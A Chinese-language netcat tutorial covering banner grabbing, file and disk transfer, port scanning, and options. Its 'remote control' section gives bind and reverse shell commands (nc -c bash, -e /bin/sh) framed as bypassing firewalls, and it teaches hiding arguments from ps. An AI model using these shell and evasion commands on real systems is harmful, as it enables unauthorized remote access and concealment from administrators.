目录

• 基础使用
  • 单向侦听
  • 双向聊天
  • 日常习惯
• 拓展使用
  • 正/反向域名解析
  • 传输⽂件/目录；加密传输
  • 端口扫描，获取banner信息
  • 远程克隆硬盘
  • 远控

基础使用

1.最简单的单向使用

使用：B（客户端） ”nc 主机名/IP 端口号/服务名"
前提：A主机打开了端口（任何对外服务的端口），B主机使用nc命令连接。
示例：

• nmap查看到172.16.70.140开了22端口，通常这是sshd的服务端口，nc上去看看（结果不一定准确）：

nc 172.16.70.140 22
SSH-2.0-OpenSSH_4.3

• 使用主机名也可以，这次我们加一个 -v 参数：

nc -v g.cn 80
Connection to g.cn 80 port [tcp/http] succeeded!

• 端口号可以不用数字，用 /etc/services 里面的服务名来代替知名端口号，不是所有的系统自带nc都支持：

nc dev3-140 ssh
SSH-2.0-OpenSSH_4.3

2.简单双向使用(chat)

A服务端：nc -lp 端口号
B客户端：nc -nv Aip A端口号
实现双向文本传输

3.隐藏命令行参数（培养日常使用习惯）

如果没有提供命令行参数，NetCat会提示你从标准输入来输入命令参数，然后NetCat会在内部解析输入。用这种办法输入命令式参数，可以用来防止借助“ps”来查看你的命令行参数。示例：

• nc
  Cmd line: -l 1234

此时我们在系统上用ps命令查看nc的进程，是看不到nc的参数的。如果我们直接在命令行写上参数，ps就能看到命令行参数了。

• nc -l 1234
  // 上面命令我们一般能用ps命令查看到类似下面的信息。
• ps aux|grep nc
  root 7332 0.0 0.0 1772 536 pts/4 S+ 10:38 0:00 nc -l 1234

拓展使用

1.正/反向域名解析

主机参数可以是一个名字或一个IP地址。

• -n，接受IP地址，不再对计算机的名字或域名进行解析。
• 没有-n，加上-v，NetCat可进行正/反向域名解析，并警告the all-too-common problem of mismatched name in DNS。这会耗费稍多一点时间，但在某些情况下会有用处。如，你想知道某个IP的主机名，NetCat可省却你手工查找的时间。
• A机器使用参数运行nc：

/data/bin/nc -l 1234
...
B机器连接：
nc -v dev3-168 1234
Connection to dev3-168 1234 port [tcp/search-agent] succeeded!
...
接着在B机器输入任何字符串并按Enter键，甲机器都能收到。

上面dev3-168是我的域中一个机器名，-v参数和-n参数都对主机名解析。都是-v参数可以通过ip反向解析出主机名。示例：

• nc -v 172.16.70.140 1234
  dev3-140.dev.cn.tlan [172.16.70.140] 1234 (?) open

2.传输⽂件/目录

• 传输单个⽂件

A：nc -lp 333 > 1.mp4
B：nc -nv 1.1.1.1 333 < 1.mp4 –q 1

或反向：

A：nc -q 1 -lp 333 < a.mp4
B： nc -nv 1.1.1.1 333 > 2.mp4

• 传输目录(多个文件)
  原理:输出端打包压缩包传输，输入端解包。

A：tar -cvf - dir_name | nc -lp 333 –q 1
B：nc -nv 1.1.1.1 333 | tar -xvf –

或使用bzip2或者其他工具压缩

A：tar -cvf – dir_name | bzip2 -z | nc -l 1567
B：nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -

• 加密传⽂件

A：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > file.txt
B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

或：

A：nc localhost 333 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
B：mcrypt –flush –bare -F -q -m ecb < file.txt | nc -lp 333

3.端口扫描

nc -nvz 1.1.1.1 1-65535

nc –vnzu 1.1.1.1 1-1024

默认是TCP模式，-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接， 不进行数据交换
v 参数指使用冗余选项（即详细输出）
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

命令会打印21到25 所有开放的端口。Banner是一个文本，Banner是一个你连接的服务发送给你的文本信息。可作为基础扫描，Banner信息可被修改，结果不一定准确。

4.远程克隆硬盘

A： nc -lp 333 | dd of=/dev/sda
B： dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1

dd是一个从磁盘读取原始数据的工具，我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中，它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区，我们可以根据我们系统root分区的位置，更改sda 为sda1，sda2.等等。

5.远控（弹出shell）

正向：

A：nc -lp 333 -c bash
B：nc 1.1.1.1 333

反向（绕过防火墙）：

A：nc -lp 333
B：nc 1.1.1.1 333 -c bash

• 注：Windows⽤户把bash改成cmd；

6.补充说明

Nc缺乏加密和⾝份验证的能⼒
Ncat包含于nmap⼯具包中

A：ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B：ncat -nv 1.1.1.1 333 --ssl

7.个别参数详解

• v显示详细连接信息
  -v 参数可以将一些关于连接建立信息输出到标准错误。-v参数多出现几次，则显示的信息会更多一些。如果-v参数没有出现，则NetCat将默默地工作，至到出现错误为止。

• w设定建立链接时间
  -w num
  [root@dev3-140 opt]# nc -vvv g.cn 80 -w 1 //1秒后断开连接
  Connection to g.cn 80 port [tcp/http] succeeded!
  [root@dev3-140 opt]# nc -vvv g.cn 80 -w 2 //2秒
  Connection to g.cn 80 port [tcp/http] succeeded!

• p绑定端口
  " -p 端口 " 来绑定本地端口。除了因权限限制或端口已经使用外，-p可以绑定任何端口。Root用户可以绑定保留的1024以内的端口。如果不用-p指定端口，则使用系统给定的未使用的端口。

• l作为服务器
  -l 参数可以使NetCat以服务器状态运行，即侦听模式。
  nc -l -p 1234 [remote hostname] [remote port] 可以用来指定入连的主机和端口，如果申请连接的主机或端口不符指定，则会断开连接。

A(1.1.1.1)：nc -l -p 333 1.1.1.2 33
B(1.1.1.2)：nc 1.1.1.1 333 -p 33

• e执行指定程序
  -e 参数后面跟一可执行程序的名称，当一个连接（入或出）被建立时，这个程序被运行。需要说明的是，-e后的程序不能从NetCat的命令行接收参数，如果有参数要传递，可能需要一个脚本。通常linux的发行版是不带这个参数支持的，可以自己编译，编译时置-DGAPING_SECURITY_HOLE，则-e参数被NetCat支持。

A: nc
Cmd line: -l -p 333 1.1.1.2 33 -e /bin/sh
B：nc 1.1.1.1 -p 33
ls ---> 这是传递给1.1.1.1上/bin/sh的指令